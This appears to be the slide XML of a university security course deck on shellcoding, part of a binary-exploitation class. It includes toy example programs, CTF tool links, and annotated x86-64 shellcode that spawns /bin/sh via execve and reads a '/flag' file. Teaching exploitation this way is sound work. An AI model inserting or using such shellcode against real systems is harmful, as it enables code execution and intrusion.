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89" r:id="rId4"/>
    <p:sldMasterId id="214748369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c717ad36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c717ad36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355bd7e67_0_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355bd7e67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605bf389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9605bf389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9605bf38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9605bf38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355bd7e67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4355bd7e67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9605bf3899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9605bf3899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2595fe8407132a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2595fe8407132a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dfcdffa1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dfcdffa1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itle">
  <p:cSld name="TITLE_ONLY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11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2179341"/>
            <a:ext cx="7772400" cy="7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None/>
              <a:defRPr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ancy Section Title">
  <p:cSld name="CUSTOM">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="351C75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219700" y="2287400"/>
            <a:ext cx="6523800" cy="5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0" name="Google Shape;50;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="499975"/>
            <a:ext cx="6523800" cy="178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51" name="Google Shape;51;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="2856225"/>
            <a:ext cx="6523800" cy="17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deas">
  <p:cSld name="CUSTOM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537475" y="8683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2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="3055688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Ideas">
  <p:cSld name="CUSTOM_1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537475" y="618338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9" name="Google Shape;59;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="33494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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="1983875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ral Idea">
  <p:cSld name="CUSTOM_1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537475" y="8683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per Card">
  <p:cSld name="CUSTOM_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="EFEFE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inM98rrT.png" id="66" name="Google Shape;6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12450" y="1101425"/>
            <a:ext cx="6784150" cy="29406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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359335" y="1236350"/>
            <a:ext cx="6455700" cy="3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0" sz="1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0" sz="1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0" sz="1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0" sz="1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0" sz="1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0" sz="1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0" sz="1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0" sz="1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0" sz="1800"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359326" y="1528736"/>
            <a:ext cx="6455700" cy="22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lendar">
  <p:cSld name="CUSTOM_3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18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="0"/>
            <a:ext cx="0" cy="514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2" name="Google Shape;72;p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="0"/>
            <a:ext cx="0" cy="514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3" name="Google Shape;73;p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1285875"/>
            <a:ext cx="9145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4" name="Google Shape;74;p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3857625"/>
            <a:ext cx="9145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5" name="Google Shape;75;p18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="25717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6" name="Google Shape;76;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17514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January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7" name="Google Shape;77;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47994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February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8" name="Google Shape;78;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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March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9" name="Google Shape;79;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17514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April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0" name="Google Shape;80;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47994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May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1" name="Google Shape;81;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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June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2" name="Google Shape;82;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17514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July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3" name="Google Shape;83;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47994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August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4" name="Google Shape;84;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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September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5" name="Google Shape;85;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17514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October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47994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November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78492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December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riller Source">
  <p:cSld name="TITLE_ONLY_2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432825" y="205975"/>
            <a:ext cx="52539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19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223425" y="308250"/>
            <a:ext cx="3209400" cy="45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username = input()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username == "service":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cmd_code = atoi(input())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cmd_code == 7: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crash()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 "Unknown command".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passcode = atoi(input())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passcode &lt; 10000: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print "Invalid passcode!"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auth(username, passcode)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 "Exiting..."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exit()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toi source">
  <p:cSld name="TITLE_ONLY_2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3432825" y="205975"/>
            <a:ext cx="52539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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223425" y="308250"/>
            <a:ext cx="3209400" cy="45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def atoi(s):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n = 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for c in s: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if   c == '0': n = n*10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'1': n = n*10 + 1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'2': n = n*10 + 2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'3': n = n*10 + 3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'4': n = n*10 + 4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'5': n = n*10 + 5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'6': n = n*10 + 6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'7': n = n*10 + 7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'8': n = n*10 + 8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'9': n = n*10 + 9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else: break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return n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nalysis Options">
  <p:cSld name="TITLE_AND_TWO_COLUMNS_1_1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21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250875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Specification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should hold about the program?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="18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Logical Properties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Absence of Crashes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Type Safety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Efficiency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Memory Safety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Information Disclosure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Authentication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9" name="Google Shape;99;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6063675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Technique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 will we achieve the goal?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="18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Manual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Symbolic Execution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Abstract Interpretation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Fuzzing</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157350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Goal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do we want to achieve regarding the specification?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Verification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Testing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Transformation</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3080325" y="309100"/>
            <a:ext cx="0" cy="4684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21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5986650" y="309100"/>
            <a:ext cx="0" cy="4684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21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="346650" y="2154518"/>
            <a:ext cx="8450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Four_Boxes">
  <p:cSld name="Custom_Four_Boxe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idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="4912520"/>
            <a:ext cx="64770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6" name="Google Shape;106;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8102430" y="4914900"/>
            <a:ext cx="7620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457202" y="800100"/>
            <a:ext cx="40332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8" name="Google Shape;108;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645481" y="800100"/>
            <a:ext cx="41175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3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645477" y="2641146"/>
            <a:ext cx="41175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0" name="Google Shape;110;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454481" y="2647270"/>
            <a:ext cx="40332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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="630076"/>
            <a:ext cx="8382000" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="22225">
            <a:solidFill>
              <a:srgbClr val="0F5E9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2" name="Google Shape;11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4414" y="97655"/>
            <a:ext cx="814078" cy="49130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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619250" y="113564"/>
            <a:ext cx="71436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0" name="Google Shape;120;p24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1" name="Google Shape;121;p2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4" name="Google Shape;124;p2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5" name="Google Shape;125;p2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8" name="Google Shape;128;p26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9" name="Google Shape;129;p26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0" name="Google Shape;130;p2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TITLE_AND_TWO_COLUMNS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/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="241575"/>
            <a:ext cx="39945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3" name="Google Shape;133;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4692275" y="241575"/>
            <a:ext cx="39945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4" name="Google Shape;134;p2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AND_TWO_COLUMNS_1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/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250875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7" name="Google Shape;137;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6063675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8" name="Google Shape;138;p28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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157350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2" name="Google Shape;142;p2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145" name="Google Shape;145;p3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Only">
  <p:cSld name="TITLE_AND_BODY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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="233438"/>
            <a:ext cx="8229600" cy="46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0" name="Google Shape;150;p3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itle">
  <p:cSld name="TITLE_ONLY_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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2179341"/>
            <a:ext cx="7772400" cy="7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None/>
              <a:defRPr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6" name="Google Shape;15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ancy Section Title">
  <p:cSld name="CUSTOM">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="351C75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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="2287400"/>
            <a:ext cx="6523800" cy="5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9" name="Google Shape;159;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="499975"/>
            <a:ext cx="6523800" cy="178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160" name="Google Shape;160;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219700" y="2856225"/>
            <a:ext cx="6523800" cy="17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161" name="Google Shape;161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deas">
  <p:cSld name="CUSTOM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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="8683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4" name="Google Shape;164;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="3055688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5" name="Google Shape;165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Ideas">
  <p:cSld name="CUSTOM_1_2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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="618338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8" name="Google Shape;168;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="33494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9" name="Google Shape;169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37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="1983875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ral Idea">
  <p:cSld name="CUSTOM_1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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537475" y="8683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73" name="Google Shape;173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per Card">
  <p:cSld name="CUSTOM_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="EFEFEF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inM98rrT.png" id="175" name="Google Shape;175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12450" y="1101425"/>
            <a:ext cx="6784150" cy="294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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359335" y="1236350"/>
            <a:ext cx="6455700" cy="3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1800"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359326" y="1528736"/>
            <a:ext cx="6455700" cy="22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78" name="Google Shape;178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lendar">
  <p:cSld name="CUSTOM_3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p40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="0"/>
            <a:ext cx="0" cy="514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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="0"/>
            <a:ext cx="0" cy="514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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1285875"/>
            <a:ext cx="9145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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3857625"/>
            <a:ext cx="9145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40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="25717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85" name="Google Shape;185;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17514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January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6" name="Google Shape;186;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47994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February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7" name="Google Shape;187;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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March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8" name="Google Shape;188;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17514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April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9" name="Google Shape;189;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47994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May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0" name="Google Shape;190;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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June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1" name="Google Shape;191;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17514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July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2" name="Google Shape;192;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47994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August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3" name="Google Shape;193;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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September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4" name="Google Shape;194;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17514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October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5" name="Google Shape;195;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47994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November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6" name="Google Shape;196;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78492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December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riller Source">
  <p:cSld name="TITLE_ONLY_2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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3432825" y="205975"/>
            <a:ext cx="52539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9" name="Google Shape;199;p4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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223425" y="308250"/>
            <a:ext cx="3209400" cy="45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username = input()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username == "service":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cmd_code = atoi(input())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cmd_code == 7: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crash()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 "Unknown command".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passcode = atoi(input())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passcode &lt; 10000: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print "Invalid passcode!"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auth(username, passcode)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 "Exiting..."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exit()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TITLE_AND_TWO_COLUMNS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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="241575"/>
            <a:ext cx="39945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692275" y="241575"/>
            <a:ext cx="39945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toi source">
  <p:cSld name="TITLE_ONLY_2_1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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3432825" y="205975"/>
            <a:ext cx="52539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3" name="Google Shape;203;p4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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223425" y="308250"/>
            <a:ext cx="3209400" cy="45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def atoi(s):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n = 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for c in s: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if   c == '0': n = n*10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'1': n = n*10 + 1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'2': n = n*10 + 2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'3': n = n*10 + 3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'4': n = n*10 + 4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'5': n = n*10 + 5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'6': n = n*10 + 6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'7': n = n*10 + 7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'8': n = n*10 + 8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'9': n = n*10 + 9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else: break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return n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nalysis Options">
  <p:cSld name="TITLE_AND_TWO_COLUMNS_1_1_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7" name="Google Shape;207;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250875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Specification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should hold about the program?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="18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Logical Properties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Absence of Crashes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Type Safety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Efficiency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Memory Safety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Information Disclosure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Authentication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8" name="Google Shape;208;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6063675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Technique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 will we achieve the goal?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="18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Manual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Symbolic Execution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Abstract Interpretation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Fuzzing</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157350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Goal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do we want to achieve regarding the specification?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Verification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Testing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Transformation</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3080325" y="309100"/>
            <a:ext cx="0" cy="4684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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5986650" y="309100"/>
            <a:ext cx="0" cy="4684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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="346650" y="2154518"/>
            <a:ext cx="8450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AND_TWO_COLUMNS_1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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250875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6063675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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3157350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Only">
  <p:cSld name="TITLE_AND_BODY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457200" y="233438"/>
            <a:ext cx="8229600" cy="46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40.xml"/><Relationship Id="rId6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9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  <a:def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  <a:def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17" name="Google Shape;117;p2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  <p:sldLayoutId id="2147483688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Gallopsled/pwntools" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/yrp604/rappel" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/longld/peda" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zardus/ctf-tools" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ref.x86asm.net/coder64.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/scwuaptx/Pwngdb" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwndbg/pwndb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4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Shellcoding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p44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Shellcode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Yan Shoshitaishvili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Arizona State University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"shell"code?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p4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Usually, the goal of an exploit is to achieve arbitrary command execution.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 typical attack goal is to launch a shell: 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execve("/bin/sh", NULL, NULL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: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mov rax, 59			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# this is the syscall number of execve</a:t>
            </a:r>
            <a:endParaRPr sz="1000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lea rdi, [rip+binsh]	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# points the first argument of execve at the /bin/sh string below</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov rsi, 0			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# this makes the second argument, argv, NULL</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov rdx, 0			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# this makes the third argument, envp, NULL</a:t>
            </a:r>
            <a:endParaRPr sz="1000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syscall			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# this triggers the system call</a:t>
            </a:r>
            <a:endParaRPr sz="1000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binsh:				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# a label marking where the /bin/sh string is</a:t>
            </a:r>
            <a:endParaRPr sz="1000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.string "/bin/sh"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Thus: "shellcode".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Tangent: DATA in your CODE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p4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.string "/bin/sh"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/>
              <a:t>???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intersperse arbitrary data in your shellcode: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.byte 0x48, 0x45, 0x4C, 0x4C, 0x4F	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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# "HELLO"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="14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.string "HELLO"					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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# "HELLO\0"</a:t>
            </a:r>
            <a:endParaRPr sz="1400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Other ways to embed data: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mov rbx, 0x0068732f6e69622f	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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# move "/bin/sh\0" into rbx</a:t>
            </a:r>
            <a:endParaRPr sz="1400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push rbx					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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# push "/bin/sh\0" onto the stack</a:t>
            </a:r>
            <a:endParaRPr sz="1400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mov rdi, rsp				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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# point rdi at the stack</a:t>
            </a:r>
            <a:endParaRPr sz="1400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Non-shell shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p4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Shellcode can have many different goals, other than just dropping a shell.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Specialized for our class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: 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sendfile(1, open("/flag", NULL), 0, 1000)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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mov rbx, 0x00000067616c662f	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# push "/flag" filename</a:t>
            </a:r>
            <a:endParaRPr sz="1000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push rbx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mov rax, 2				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# syscall number of open</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov rdi, rsp				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# point the first argument at stack (where we have "/flag")</a:t>
            </a:r>
            <a:endParaRPr sz="1000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mov rsi, 0				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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# NULL out the second argument (meaning, O_RDONLY)</a:t>
            </a:r>
            <a:endParaRPr sz="1000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syscall				</a:t>
            </a:r>
            <a:r>
